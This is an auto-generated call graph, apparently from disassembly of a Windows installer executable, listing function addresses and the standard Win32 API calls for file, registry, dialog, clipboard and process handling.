4167 402cdd MulDiv 4165->4167 4168 402c97 wsprintfA SetWindowTextA SetDlgItemTextA 4167->4168 4168->4166 4177 401563 4178 4028f9 4177->4178 4181 405ff7 wsprintfA 4178->4181 4180 4028fe 4181->4180 4182 40166a 4183 402ac1 17 API calls 4182->4183 4184 401671 4183->4184 4185 402ac1 17 API calls 4184->4185 4186 40167a 4185->4186 4187 402ac1 17 API calls 4186->4187 4188 401683 MoveFileA 4187->4188 4189 401696 4188->4189 4190 40168f 4188->4190 4191 40639c 2 API calls 4189->4191 4194 40223c 4189->4194 4192 401423 24 API calls 4190->4192 4193 4016a5 4191->4193 4192->4194 4193->4194 4195 405e78 36 API calls 4193->4195 4195->4190 3262 40246d 3273 402b01 3262->3273 3265 402ac1 17 API calls 3266 402480 3265->3266 3267 40248a RegQueryValueExA 3266->3267 3270 402716 3266->3270 3268 4024b0 RegCloseKey 3267->3268 3269 4024aa 3267->3269 3268->3270 3269->3268 3278 405ff7 wsprintfA 3269->3278 3274 402ac1 17 API calls 3273->3274 3275 402b18 3274->3275 3276 405f1f RegOpenKeyExA 3275->3276 3277 402477 3276->3277 3277->3265 3278->3268 4196 4019ed 4197 402ac1 17 API calls 4196->4197 4198 4019f4 4197->4198 4199 402ac1 17 API calls 4198->4199 4200 4019fd 4199->4200 4201 401a04 lstrcmpiA 4200->4201 4202 401a16 lstrcmpA 4200->4202 4203 401a0a 4201->4203 4202->4203 4204 40426e lstrcpynA lstrlenA 4205 40156f 4206 401586 4205->4206 4207 40157f ShowWindow 4205->4207 4208 401594 ShowWindow 4206->4208 4209 402951 4206->4209 4207->4206 4208->4209 4217 4014f4 SetForegroundWindow 4218 402951 4217->4218 4219 401cf5 4220 402a9f 17 API calls 4219->4220 4221 401cfc 4220->4221 4222 402a9f 17 API calls 4221->4222 4223 401d08 GetDlgItem 4222->4223 4224 402577 4223->4224 4225 4022f6 4226 402304 4225->4226 4227 4022fe 4225->4227 4229 402314 4226->4229 4230 402ac1 17 API calls 4226->4230 4228 402ac1 17 API calls 4227->4228 4228->4226 4231 402322 4229->4231 4232 402ac1 17 API calls 4229->4232 4230->4229 4233 402ac1 17 API calls 4231->4233 4232->4231 4234 40232b WritePrivateProfileStringA 4233->4234 4235 4026f8 4236 402ac1 17 API calls 4235->4236 4237 4026ff FindFirstFileA 4236->4237 4238 402722 4237->4238 4242 402712 4237->4242 4240 402729 4238->4240 4243 405ff7 wsprintfA 4238->4243 4244 406099 lstrcpynA 4240->4244 4243->4240 4244->4242 3800 40237b 3801 402382 3800->3801 3802 4023ad 3800->3802 3803 402b01 17 API calls 3801->3803 3804 402ac1 17 API calls 3802->3804 3805 402389 3803->3805 3806 4023b4 3804->3806 3807 402393 3805->3807 3811 4023c1 3805->3811 3812 402b7f 3806->3812 3809 402ac1 17 API calls 3807->3809 3810 40239a RegDeleteValueA RegCloseKey 3809->3810 3810->3811 3813 402b95 3812->3813 3814 402bab 3813->3814 3816 402bb4 3813->3816 3814->3811 3817 405f1f RegOpenKeyExA 3816->3817 3818 402be2 3817->3818 3819 402c5a 3818->3819 3826 402be6 3818->3826 3819->3814 3820 402c08 RegEnumKeyA 3821 402c1f RegCloseKey 3820->3821 3820->3826 3823 406431 5 API calls 3821->3823 3822 402c40 RegCloseKey 3822->3819 3825 402c2f 3823->3825 3824 402bb4 6 API calls 3824->3826 3827 402c33 3825->3827 3828 402c4e RegDeleteKeyA 3825->3828 3826->3820 3826->3821 3826->3822 3826->3824 3827->3819 3828->3819 3852 401ffd 3853 4020bd 3852->3853 3854 40200f 3852->3854 3857 401423 24 API calls 3853->3857 3855 402ac1 17 API calls 3854->3855 3856 402016 3855->3856 3858 402ac1 17 API calls 3856->3858 3862 40223c 3857->3862 3859 40201f 3858->3859 3860 402034 LoadLibraryExA 3859->3860 3861 402027 GetModuleHandleA 3859->3861 3860->3853 3863 402044 GetProcAddress 3860->3863 3861->3860 3861->3863 3864 402090 3863->3864 3865 402053 3863->3865 3866 4051c0 24 API calls 3864->3866 3867 402063 3865->3867 3868 401423 24 API calls 3865->3868 3866->3867 3867->3862 3869 4020b1 FreeLibrary 3867->3869 3868->3867 3869->3862 4245 40257d 4246 402582 4245->4246 4247 402596 4245->4247 4248 402a9f 17 API calls 4246->4248 4249 402ac1 17 API calls 4247->4249 4251 40258b 4248->4251 4250 40259d lstrlenA 4249->4250 4250->4251 4252 405cd9 WriteFile 4251->4252 4253 4025bf 4251->4253 4252->4253 4254 4018fd 4255 401934 4254->4255 4256 402ac1 17 API calls 4255->4256 4257 401939 4256->4257 4258 405861 67 API calls 4257->4258 4259 401942 4258->4259 3870 4052fe 3871 405320 GetDlgItem GetDlgItem GetDlgItem 3870->3871 3872 4054a9 3870->3872 3915 40418f SendMessageA 3871->3915 3874 4054b1 GetDlgItem CreateThread FindCloseChangeNotification 3872->3874 3875 4054d9 3872->3875 3874->3875 3918 405292 5 API calls 3874->3918 3877 405528 3875->3877 3878 4054ef ShowWindow ShowWindow 3875->3878 3879 405507 3875->3879 3876 405390 3880 405397 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3876->3880 3885 4041c1 8 API calls 3877->3885 3917 40418f SendMessageA 3878->3917 3881 405562 3879->3881 3883 405517 3879->3883 3884 40553b ShowWindow 3879->3884 3889 405405 3880->3889 3890 4053e9 SendMessageA SendMessageA 3880->3890 3881->3877 3891 40556f SendMessageA 3881->3891 3892 404133 SendMessageA 3883->3892 3887 40555b 3884->3887 3888 40554d 3884->3888 3886 405534 3885->3886 3894 404133 SendMessageA 3887->3894 3893 4051c0 24 API calls 3888->3893 3895 405418 3889->3895 3896 40540a SendMessageA 3889->3896 3890->3889 3891->3886 3897 405588 CreatePopupMenu 3891->3897 3892->3877 3893->3887 3894->3881 3899 40415a 18 API calls 3895->3899 3896->3895 3898 4060bb 17 API calls 3897->3898 3900 405598 AppendMenuA 3898->3900 3901 405428 3899->3901 3902 4055b6 GetWindowRect 3900->3902 3903 4055c9 TrackPopupMenu 3900->3903 3904 405431 ShowWindow 3901->3904 3905 405465 GetDlgItem SendMessageA 3901->3905 3902->3903 3903->3886 3907 4055e5 3903->3907 3908 405447 ShowWindow 3904->3908 3909 405454 3904->3909 3905->3886 3906 40548c SendMessageA SendMessageA 3905->3906 3906->3886 3910 405604 SendMessageA 3907->3910 3908->3909 3916 40418f SendMessageA 3909->3916 3910->3910 3911 405621 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3910->3911 3913 405643 SendMessageA 3911->3913 3913->3913 3914 405665 GlobalUnlock SetClipboardData CloseClipboard 3913->3914 3914->3886 3915->3876 3916->3905 3917->3879 4260 401000 4261 401037 BeginPaint GetClientRect 4260->4261 4263 40100c DefWindowProcA 4260->4263 4264 4010f3 4261->4264 4267 401179 4263->4267 4265 401073 CreateBrushIndirect FillRect DeleteObject 4264->4265 4266 4010fc 4264->4266 4265->4264 4268 401102 CreateFontIndirectA 4266->4268 4269 401167 EndPaint 4266->4269 4268->4269 4270 401112 6 API calls 4268->4270 4269->4267 4270->4269 4271 401900 4272 402ac1 17 API calls 4271->4272 4273 401907 4272->4273 4274 4057b5 MessageBoxIndirectA 4273->4274 4275 401910 4274->4275 4276 401502 4277 40150a 4276->4277 4279 40151d 4276->4279 4278 402a9f 17 API calls 4277->4278 4278->4279 4280 402682 4281 402689 4280->4281 4282 4028fe 4280->4282 4283 402a9f 17 API calls 4281->4283 4284 402690 4283->4284 4285 40269f SetFilePointer 4284->4285 4285->4282 4286 4026af 4285->4286 4288 405ff7 wsprintfA 4286->4288 4288->4282 4289 404583 4290 404593 4289->4290 4291 4045b9 4289->4291 4292 40415a 18 API calls 4290->4292 4293 4041c1 8 API calls 4291->4293 4294 4045a0 SetDlgItemTextA 4292->4294 4295 4045c5 4293->4295 4294->4291 4296 401c04 4297 402a9f 17 API calls 4296->4297 4298 401c0b 4297->4298 4299 402a9f 17 API calls 4298->4299 4300 401c18 4299->4300 4301 401c2d 4300->4301 4303 402ac1 17 API calls 4300->4303 4302 401c3d 4301->4302 4304 402ac1 17 API calls 4301->4304 4305 401c94 4302->4305 4306 401c48 4302->4306 4303->4301 4304->4302 4308 402ac1 17 API calls 4305->4308 4307 402a9f 17 API calls 4306->4307 4309 401c4d 4307->4309 4310 401c99 4308->4310 4311 402a9f 17 API calls 4309->4311 4312 402ac1 17 API calls 4310->4312 4314 401c59 4311->4314 4313 401ca2 FindWindowExA 4312->4313 4315 401cc0 4313->4315 4316 401c84 SendMessageA 4314->4316 4317 401c66 SendMessageTimeoutA 4314->4317 4316->4315 4317->4315 3155 403c86 3156 403dd9 3155->3156 3157 403c9e 3155->3157 3159 403e2a 3156->3159 3160 403dea GetDlgItem GetDlgItem 3156->3160 3157->3156 3158 403caa 3157->3158 3161 403cb5 SetWindowPos 3158->3161 3162 403cc8 3158->3162 3164 403e84 3159->3164 3173 401389 2 API calls 3159->3173 3163 40415a 18 API calls 3160->3163 3161->3162 3166 403ce5 3162->3166 3167 403ccd ShowWindow 3162->3167 3168 403e14 SetClassLongA 3163->3168 3169 403dd4 3164->3169 3226 4041a6 3164->3226 3170 403d07 3166->3170 3171 403ced DestroyWindow 3166->3171 3167->3166 3172 40140b 2 API calls 3168->3172 3174 403d0c SetWindowLongA 3170->3174 3175 403d1d 3170->3175 3225 4040e3 3171->3225 3172->3159 3176 403e5c 3173->3176 3174->3169 3179 403dc6 3175->3179 3180 403d29 GetDlgItem 3175->3180 3176->3164 3181 403e60 SendMessageA 3176->3181 3177 40140b 2 API calls 3195 403e96 3177->3195 3178 4040e5 DestroyWindow EndDialog 3178->3225 3248 4041c1 3179->3248 3184 403d59 3180->3184 3185 403d3c SendMessageA IsWindowEnabled 3180->3185 3181->3169 3183 404114 ShowWindow 3183->3169 3187 403d66 3184->3187 3188 403dad SendMessageA 3184->3188 3189 403d79 3184->3189 3198 403d5e 3184->3198 3185->3169 3185->3184 3186 4060bb 17 API calls 3186->3195 3187->3188 3187->3198 3188->3179 3192 403d81 3189->3192 3193 403d96 3189->3193 3191 40415a 18 API calls 3191->3195 3242 40140b 3192->3242 3197 40140b 2 API calls 3193->3197 3194 403d94 3194->3179 3195->3169 3195->3177 3195->3178 3195->3186 3195->3191 3216 404025 DestroyWindow 3195->3216 3229 40415a 3195->3229 3199 403d9d 3197->3199 3245 404133 3198->3245 3199->3179 3199->3198 3201 403f11 GetDlgItem 3202 403f26 3201->3202 3203 403f2e ShowWindow KiUserCallbackDispatcher 3201->3203 3202->3203 3232 40417c KiUserCallbackDispatcher 3203->3232 3205 403f58 EnableWindow 3210 403f6c 3205->3210 3206 403f71 GetSystemMenu EnableMenuItem SendMessageA 3207 403fa1 SendMessageA 3206->3207 3206->3210 3207->3210 3210->3206 3233 40418f SendMessageA 3210->3233 3234 403c67 3210->3234 3237 406099 lstrcpynA 3210->3237 3212 403fd0 lstrlenA 3213 4060bb 17 API calls 3212->3213 3214 403fe1 SetWindowTextA 3213->3214 3238 401389 3214->3238 3217 40403f CreateDialogParamA 3216->3217 3216->3225 3218 404072 3217->3218 3217->3225 3219 40415a 18 API calls 3218->3219 3220 40407d GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3219->3220 3221 401389 2 API calls 3220->3221 3222 4040c3 3221->3222 3222->3169 3223 4040cb ShowWindow 3222->3223 3224 4041a6 SendMessageA 3223->3224 3224->3225 3225->3169 3225->3183 3227 4041be 3226->3227 3228 4041af SendMessageA 3226->3228 3227->3195 3228->3227 3230 4060bb 17 API calls 3229->3230 3231 404165 SetDlgItemTextA 3230->3231 3231->3201 3232->3205 3233->3210 3235 4060bb 17 API calls 3234->3235 3236 403c75 SetWindowTextA 3235->3236 3236->3210 3237->3212 3240 401390 3238->3240 3239 4013fe 3239->3195 3240->3239 3241 4013cb MulDiv SendMessageA 3240->3241 3241->3240 3243 401389 2 API calls 3242->3243 3244 401420 3243->3244 3244->3198 3246 404140 SendMessageA 3245->3246 3247 40413a 3245->3247 3246->3194 3247->3246 3249 4041d9 GetWindowLongA 3248->3249 3259 404262 3248->3259 3250 4041ea 3249->3250 3249->3259 3251 4041f9 GetSysColor 3250->3251 3252 4041fc 3250->3252 3251->3252 3253 404202 SetTextColor 3252->3253 3254 40420c SetBkMode 3252->3254 3253->3254 3255 404224 GetSysColor 3254->3255 3256 40422a 3254->3256 3255->3256 3257 404231 SetBkColor 3256->3257 3258 40423b 3256->3258 3257->3258 3258->3259 3260 404255 CreateBrushIndirect 3258->3260 3261 40424e DeleteObject 3258->3261 3259->3169 3260->3259 3261->3260 3279 40330d SetErrorMode GetVersion 3280 40334e 3279->3280 3281 403354 3279->3281 3282 406431 5 API calls 3280->3282 3370 4063c3 GetSystemDirectoryA 3281->3370 3282->3281 3284 40336a lstrlenA 3284->3281 3285 403379 3284->3285 3373 406431 GetModuleHandleA 3285->3373 3288 406431 5 API calls 3289 403387 3288->3289 3290 406431 5 API calls 3289->3290 3291 403393 #17 OleInitialize SHGetFileInfoA 3290->3291 3379 406099 lstrcpynA 3291->3379 3294 4033df GetCommandLineA 3380 406099 lstrcpynA 3294->3380 3296 4033f1 GetModuleHandleA 3297 403408 3296->3297 3298 405a5c CharNextA 3297->3298 3299 40341c CharNextA 3298->3299 3307 40342c 3299->3307 3300 4034f6 3301 403509 GetTempPathA 3300->3301 3381 4032dc 3301->3381 3303 403521 3304 403525 GetWindowsDirectoryA lstrcatA 3303->3304 3305 40357b DeleteFileA 3303->3305 3308 4032dc 12 API calls 3304->3308 3391 402d98 GetTickCount GetModuleFileNameA 3305->3391 3306 405a5c CharNextA 3306->3307 3307->3300 3307->3306 3311 4034f8 3307->3311 3310 403541 3308->3310 3310->3305 3314 403545 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3310->3314 3488 406099 lstrcpynA 3311->3488 3312 40358f 3317 405a5c CharNextA 3312->3317 3353 403615 3312->3353 3365 403625 3312->3365 3316 4032dc 12 API calls 3314->3316 3319 403573 3316->3319 3321 4035aa 3317->3321 3319->3305 3319->3365 3328 4035f0 3321->3328 3329 403655 3321->3329 3322 40375d 3325 403765 GetCurrentProcess OpenProcessToken 3322->3325 3326 4037df ExitProcess 3322->3326 3323 40363f 3514 4057b5 3323->3514 3331 4037b0 3325->3331 3332 403780 LookupPrivilegeValueA AdjustTokenPrivileges 3325->3332 3489 405b1f 3328->3489 3477 405720 3329->3477 3335 406431 5 API calls 3331->3335 3332->3331 3340 4037b7 3335->3340 3338 403676 lstrcatA lstrcmpiA 3344 403692 3338->3344 3338->3365 3339 40366b lstrcatA 3339->3338 3341 4037cc ExitWindowsEx 3340->3341 3342 4037d8 3340->3342 3341->3326 3341->3342 3345 40140b 2 API calls 3342->3345 3347 403697 3344->3347 3348 40369e 3344->3348 3345->3326 3346 40360a 3504 406099 lstrcpynA 3346->3504 3518 405686 CreateDirectoryA 3347->3518 3523 405703 CreateDirectoryA 3348->3523 3352 4036a3 SetCurrentDirectoryA 3355 4036b2 3352->3355 3356 4036bd 3352->3356 3421 4038e9 3353->3421 3526 406099 lstrcpynA 3355->3526 3480 406099 lstrcpynA 3356->3480 3359 4060bb 17 API calls 3360 4036fc DeleteFileA 3359->3360 3361 403709 CopyFileA 3360->3361 3367 4036cb 3360->3367 3361->3367 3362 403751 3363 405e78 36 API calls 3362->3363 3363->3365 3505 4037f7 3365->3505 3366 4060bb 17 API calls 3366->3367 3367->3359 3367->3362 3367->3366 3369 40373d CloseHandle 3367->3369 3481 405e78 MoveFileExA 3367->3481 3485 405738 CreateProcessA 3367->3485 3369->3367 3371 4063e5 wsprintfA LoadLibraryExA 3370->3371 3371->3284 3374 406457 GetProcAddress 3373->3374 3375 40644d 3373->3375 3377 403380 3374->3377 3376 4063c3 3 API calls 3375->3376 3378 406453 3376->3378 3377->3288 3378->3374 3378->3377 3379->3294 3380->3296 3382 406303 5 API calls 3381->3382 3384 4032e8 3382->3384 3383 4032f2 3383->3303 3384->3383 3527 405a31 lstrlenA CharPrevA 3384->3527 3387 405703 2 API calls 3388 403300 3387->3388 3389 405c61 2 API calls 3388->3389 3390 40330b 3389->3390 3390->3303 3530 405c32 GetFileAttributesA CreateFileA 3391->3530 3393 402ddb 3420 402de8 3393->3420 3531 406099 lstrcpynA 3393->3531 3395 402dfe 3532 405a78 lstrlenA 3395->3532 3399 402e0f GetFileSize 3400 402f10 3399->3400 3418 402e26 3399->3418 3537 402cf9 3400->3537 3404 402f53 GlobalAlloc 3408 402f6a 3404->3408 3405 402fab 3406 402cf9 32 API calls 3405->3406 3406->3420 3412 405c61 2 API calls 3408->3412 3409 402f34 3410 4032af ReadFile 3409->3410 3413 402f3f 3410->3413 3411 402cf9 32 API calls 3411->3418 3414 402f7b CreateFileA 3412->3414 3413->3404 3413->3420 3415 402fb5 3414->3415 3414->3420 3552 4032c5 SetFilePointer 3415->3552 3417 402fc3 3553 40303e 3417->3553 3418->3400 3418->3405 3418->3411 3418->3420 3568 4032af 3418->3568 3420->3312 3422 406431 5 API calls 3421->3422 3423 4038fd 3422->3423 3424 403903 3423->3424 3425 403915 3423->3425 3619 405ff7 wsprintfA 3424->3619 3426 405f80 3 API calls 3425->3426 3427 403940 3426->3427 3429 40395e lstrcatA 3427->3429 3431 405f80 3 API calls 3427->3431 3430 403913 3429->3430 3604 403bae 3430->3604 3431->3429 3434 405b1f 18 API calls 3435 403990 3434->3435 3436 403a19 3435->3436 3438 405f80 3 API calls 3435->3438 3437 405b1f 18 API calls 3436->3437 3439 403a1f 3437->3439 3440 4039bc 3438->3440 3441 403a2f LoadImageA 3439->3441 3442 4060bb 17 API calls 3439->3442 3440->3436 3445 4039d8 lstrlenA 3440->3445 3449 405a5c CharNextA 3440->3449 3443 403ad5 3441->3443 3444 403a56 RegisterClassA 3441->3444 3442->3441 3448 40140b 2 API calls 3443->3448 3446 403adf 3444->3446 3447 403a8c SystemParametersInfoA CreateWindowExA 3444->3447 3450 4039e6 lstrcmpiA 3445->3450 3451 403a0c 3445->3451 3446->3365 3447->3443 3452 403adb 3448->3452 3453 4039d6 3449->3453 3450->3451 3454 4039f6 GetFileAttributesA 3450->3454 3455 405a31 3 API calls 3451->3455 3452->3446 3458 403bae 18 API calls 3452->3458 3453->3445 3457 403a02 3454->3457 3456 403a12 3455->3456 3620 406099 lstrcpynA 3456->3620 3457->3451 3461 405a78 2 API calls 3457->3461 3459 403aec 3458->3459 3462 403af8 ShowWindow 3459->3462 3463 403b7b 3459->3463 3461->3451 3464 4063c3 3 API calls 3462->3464 3612 405292 OleInitialize 3463->3612 3466 403b10 3464->3466 3470 403b1e GetClassInfoA 3466->3470 3472 4063c3 3 API calls 3466->3472 3467 403b81 3468 403b85 3467->3468 3469 403b9d 3467->3469 3468->3446 3475 40140b 2 API calls 3468->3475 3471 40140b 2 API calls 3469->3471 3473 403b32 GetClassInfoA RegisterClassA 3470->3473 3474 403b48 DialogBoxParamA 3470->3474 3471->3446 3472->3470 3473->3474 3476 40140b 2 API calls 3474->3476 3475->3446 3476->3446 3478 406431 5 API calls 3477->3478 3479 40365a lstrcatA 3478->3479 3479->3338 3479->3339 3480->3367 3482 405e8c 3481->3482 3484 405e99 3481->3484 3622 405d08 3482->3622 3484->3367 3486 405777 3485->3486 3487 40576b CloseHandle 3485->3487 3486->3367 3487->3486 3488->3301 3656 406099 lstrcpynA 3489->3656 3491 405b30 3657 405aca CharNextA CharNextA 3491->3657 3494 4035fb 3494->3365 3503 406099 lstrcpynA 3494->3503 3495 406303 5 API calls 3501 405b46 3495->3501 3496 405b71 lstrlenA 3497 405b7c 3496->3497 3496->3501 3499 405a31 3 API calls 3497->3499 3498 40639c 2 API calls 3498->3501 3500 405b81 GetFileAttributesA 3499->3500 3500->3494 3501->3494 3501->3496 3501->3498 3502 405a78 2 API calls 3501->3502 3502->3496 3503->3346 3504->3353 3506 403812 3505->3506 3507 403808 CloseHandle 3505->3507 3508 403826 3506->3508 3509 40381c CloseHandle 3506->3509 3507->3506 3663 403854 3508->3663 3509->3508 3516 4057ca 3514->3516 3515 40364d ExitProcess 3516->3515 3517 4057de MessageBoxIndirectA 3516->3517 3517->3515 3519 40369c 3518->3519 3520 4056d7 GetLastError 3518->3520 3519->3352 3520->3519 3521 4056e6 SetFileSecurityA 3520->3521 3521->3519 3522 4056fc GetLastError 3521->3522 3522->3519 3524 405713 3523->3524 3525 405717 GetLastError 3523->3525 3524->3352 3525->3524 3526->3356 3528 4032fa 3527->3528 3529 405a4b lstrcatA 3527->3529 3528->3387 3529->3528 3530->3393 3531->3395 3533 405a85 3532->3533 3534 402e04 3533->3534 3535 405a8a CharPrevA 3533->3535 3536 406099 lstrcpynA 3534->3536 3535->3533 3535->3534 3536->3399 3538 402d07 3537->3538 3539 402d1f 3537->3539 3540 402d10 DestroyWindow 3538->3540 3545 402d17 3538->3545 3541 402d27 3539->3541 3542 402d2f GetTickCount 3539->3542 3540->3545 3572 40646d 3541->3572 3544 402d3d 3542->3544 3542->3545 3546 402d72 CreateDialogParamA ShowWindow 3544->3546 3547 402d45 3544->3547 3545->3404 3545->3420 3571 4032c5 SetFilePointer 3545->3571 3546->3545 3547->3545 3576 402cdd 3547->3576 3549 402d53 wsprintfA 3550 4051c0 24 API calls 3549->3550 3551 402d70 3550->3551 3551->3545 3552->3417 3554 403069 3553->3554 3555 40304d SetFilePointer 3553->3555 3579 403146 GetTickCount 3554->3579 3555->3554 3558 403106 3558->3420 3561 403146 42 API calls 3562 4030a0 3561->3562 3562->3558 3563 40310c ReadFile 3562->3563 3565 4030af 3562->3565 3563->3558 3565->3558 3566 405caa ReadFile 3565->3566 3594 405cd9 WriteFile 3565->3594 3566->3565 3569 405caa ReadFile 3568->3569 3570 4032c2 3569->3570 3570->3418 3571->3409 3573 40648a PeekMessageA 3572->3573 3574 406480 DispatchMessageA 3573->3574 3575 40649a 3573->3575 3574->3573 3575->3545 3577 402cec 3576->3577 3578 402cee MulDiv 3576->3578 3577->3578 3578->3549 3580 403174 3579->3580 3581 40329e 3579->3581 3596 4032c5 SetFilePointer 3580->3596 3582 402cf9 32 API calls 3581->3582 3584 403070 3582->3584 3584->3558 3592 405caa ReadFile 3584->3592 3585 40317f SetFilePointer 3587 4031a4 3585->3587 3586 4032af ReadFile 3586->3587 3587->3584 3587->3586 3589 402cf9 32 API calls 3587->3589 3590 405cd9 WriteFile 3587->3590 3591 40327f SetFilePointer 3587->3591 3597 406576 3587->3597 3589->3587 3590->3587 3591->3581 3593 403089 3592->3593 3593->3558 3593->3561 3595 405cf7 3594->3595 3595->3565 3596->3585 3598 40659b 3597->3598 3599 4065a3 3597->3599 3598->3587 3599->3598 3600 406633 GlobalAlloc 3599->3600 3601 40662a GlobalFree 3599->3601 3602 4066a1 GlobalFree 3599->3602 3603 4066aa GlobalAlloc 3599->3603 3600->3598 3600->3599 3601->3600 3602->3603 3603->3598 3603->3599 3605 403bc2 3604->3605 3621 405ff7 wsprintfA 3605->3621 3607 403c33 3608 403c67 18 API calls 3607->3608 3610 403c38 3608->3610 3609 40396e 3609->3434 3610->3609 3611 4060bb 17 API calls 3610->3611 3611->3610 3613 4041a6 SendMessageA 3612->3613 3616 4052b5 3613->3616 3614 4052dc 3615 4041a6 SendMessageA 3614->3615 3617 4052ee OleUninitialize 3615->3617 3616->3614 3618 401389 2 API calls 3616->3618 3617->3467 3618->3616 3619->3430 3620->3436 3621->3607 3623 405d54 GetShortPathNameA 3622->3623 3624 405d2e 3622->3624 3626 405e73 3623->3626 3627 405d69 3623->3627 3649 405c32 GetFileAttributesA CreateFileA 3624->3649 3626->3484 3627->3626 3629 405d71 wsprintfA 3627->3629 3628 405d38 CloseHandle GetShortPathNameA 3628->3626 3630 405d4c 3628->3630 3631 4060bb 17 API calls 3629->3631 3630->3623 3630->3626 3632 405d99 3631->3632 3650 405c32 GetFileAttributesA CreateFileA 3632->3650 3634 405da6 3634->3626 3635 405db5 GetFileSize GlobalAlloc 3634->3635 3636 405dd7 3635->3636 3637 405e6c CloseHandle 3635->3637 3638 405caa ReadFile 3636->3638 3637->3626 3639 405ddf 3638->3639 3639->3637 3651 405b97 lstrlenA 3639->3651 3642 405df6 lstrcpyA 3644 405e18 3642->3644 3643 405e0a 3645 405b97 4 API calls 3643->3645 3646 405e4f SetFilePointer 3644->3646 3645->3644 3647 405cd9 WriteFile 3646->3647 3648 405e65 GlobalFree 3647->3648 3648->3637 3649->3628 3650->3634 3652 405bd8 lstrlenA 3651->3652 3653 405bb1 lstrcmpiA 3652->3653 3654 405be0 3652->3654 3653->3654 3655 405bcf CharNextA 3653->3655 3654->3642 3654->3643 3655->3652 3656->3491 3658 405ae5 3657->3658 3660 405af5 3657->3660 3658->3660 3661 405af0 CharNextA 3658->3661 3659 405b15 3659->3494 3659->3495 3660->3659 3662 405a5c CharNextA 3660->3662 3661->3659 3662->3660 3664 403862 3663->3664 3665 40382b 3664->3665 3666 403867 FreeLibrary GlobalFree 3664->3666 3667 405861 3665->3667 3666->3665 3666->3666 3668 405b1f 18 API calls 3667->3668 3669 405881 3668->3669 3670 4058a0 3669->3670 3671 405889 DeleteFileA 3669->3671 3673 4059d8 3670->3673 3707 406099 lstrcpynA 3670->3707 3672 40362e OleUninitialize 3671->3672 3672->3322 3672->3323 3673->3672 3678 40639c 2 API calls 3673->3678 3675 4058c6 3676 4058d9 3675->3676 3677 4058cc lstrcatA 3675->3677 3680 405a78 2 API calls 3676->3680 3679 4058df 3677->3679 3681 4059f2 3678->3681 3682 4058ed lstrcatA 3679->3682 3683 4058f8 lstrlenA FindFirstFileA 3679->3683 3680->3679 3681->3672 3684 4059f6 3681->3684 3682->3683 3685 4059ce 3683->3685 3705 40591c 3683->3705 3686 405a31 3 API calls 3684->3686 3685->3673 3688 4059fc 3686->3688 3687 405a5c CharNextA 3687->3705 3689 405819 5 API calls 3688->3689 3690 405a08 3689->3690 3691 405a22 3690->3691 3692 405a0c 3690->3692 3693 4051c0 24 API calls 3691->3693 3692->3672 3697 4051c0 24 API calls 3692->3697 3693->3672 3694 4059ad FindNextFileA 3696 4059c5 FindClose 3694->3696 3694->3705 3696->3685 3698 405a19 3697->3698 3699 405e78 36 API calls 3698->3699 3701 405a20 3699->3701 3701->3672 3702 405861 60 API calls 3702->3705 3703 4051c0 24 API calls 3703->3694 3704 4051c0 24 API calls 3704->3705 3705->3687 3705->3694 3705->3702 3705->3703 3705->3704 3706 405e78 36 API calls 3705->3706 3708 406099 lstrcpynA 3705->3708 3709 405819 3705->3709 3706->3705 3707->3675 3708->3705 3717 405c0d GetFileAttributesA 3709->3717 3712 405846 3712->3705 3713 405834 RemoveDirectoryA 3715 405842 3713->3715 3714 40583c DeleteFileA 3714->3715 3715->3712 3716 405852 SetFileAttributesA 3715->3716 3716->3712 3718 405825 3717->3718 3719 405c1f SetFileAttributesA 3717->3719 3718->3712 3718->3713 3718->3714 3719->3718 4325 401490 4326 4051c0 24 API calls 4325->4326 4327 401497 4326->4327 4328 401d95 GetDC 4329 402a9f 17 API calls 4328->4329 4330 401da7 GetDeviceCaps MulDiv ReleaseDC 4329->4330 4331 402a9f 17 API calls 4330->4331 4332 401dd8 4331->4332 4333 4060bb 17 API calls 4332->4333 4334 401e15 CreateFontIndirectA 4333->4334 4335 402577 4334->4335 4343 401d1a 4344 402a9f 17 API calls 4343->4344 4345 401d28 SetWindowLongA 4344->4345 4346 402951 4345->4346 4347 40491b 4348 404947 4347->4348 4349 40492b 4347->4349 4351 40497a 4348->4351 4352 40494d SHGetPathFromIDListA 4348->4352 4358 405799 GetDlgItemTextA 4349->4358 4354 404964 SendMessageA 4352->4354 4355 40495d 4352->4355 4353 404938 SendMessageA 4353->4348 4354->4351 4356 40140b 2 API calls 4355->4356 4356->4354 4358->4353 4364 40149d 4365 4022e1 4364->4365 4366 4014ab PostQuitMessage 4364->4366 4366->4365 4367 40159d 4368 402ac1 17 API calls 4367->4368 4369 4015a4 SetFileAttributesA 4368->4369 4370 4015b6 4369->4370 4371 401a1e 4372 402ac1 17 API calls 4371->4372 4373 401a27 ExpandEnvironmentStringsA 4372->4373 4374 401a3b 4373->4374 4376 401a4e 4373->4376 4375 401a40 lstrcmpA 4374->4375 4374->4376 4375->4376 4377 40171f 4378 402ac1 17 API calls 4377->4378 4379 401726 SearchPathA 4378->4379 4380 401741 4379->4380 4381 4042a3 4382 4042b9 4381->4382 4387 4043c5 4381->4387 4385 40415a 18 API calls 4382->4385 4383 404434 4384 4044fe 4383->4384 4386 40443e GetDlgItem 4383->4386 4393 4041c1 8 API calls 4384->4393 4388 40430f 4385->4388 4389 404454 4386->4389 4390 4044bc 4386->4390 4387->4383 4387->4384 4391 404409 GetDlgItem SendMessageA 4387->4391 4392 40415a 18 API calls 4388->4392 4389->4390 4397 40447a SendMessageA LoadCursorA SetCursor 4389->4397 4390->4384 4394 4044ce 4390->4394 4414 40417c KiUserCallbackDispatcher 4391->4414 4396 40431c CheckDlgButton 4392->4396 4403 4044f9 4393->4403 4398 4044d4 SendMessageA 4394->4398 4399 4044e5 4394->4399 4412 40417c KiUserCallbackDispatcher 4396->4412 4415 404547 4397->4415 4398->4399 4399->4403 4404 4044eb SendMessageA 4399->4404 4400 40442f 4405 404523 SendMessageA 4400->4405 4404->4403 4405->4383 4406 40433a GetDlgItem 4413 40418f SendMessageA 4406->4413 4409 404350 SendMessageA 4410 404377 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4409->4410 4411 40436e GetSysColor 4409->4411 4410->4403 4411->4410 4412->4406 4413->4409 4414->4400 4418 40577b ShellExecuteExA 4415->4418 4417 4044ad LoadCursorA SetCursor 4417->4390 4418->4417 4419 401e25 4420 402a9f 17 API calls 4419->4420 4421 401e2b 4420->4421 4422 402a9f 17 API calls 4421->4422 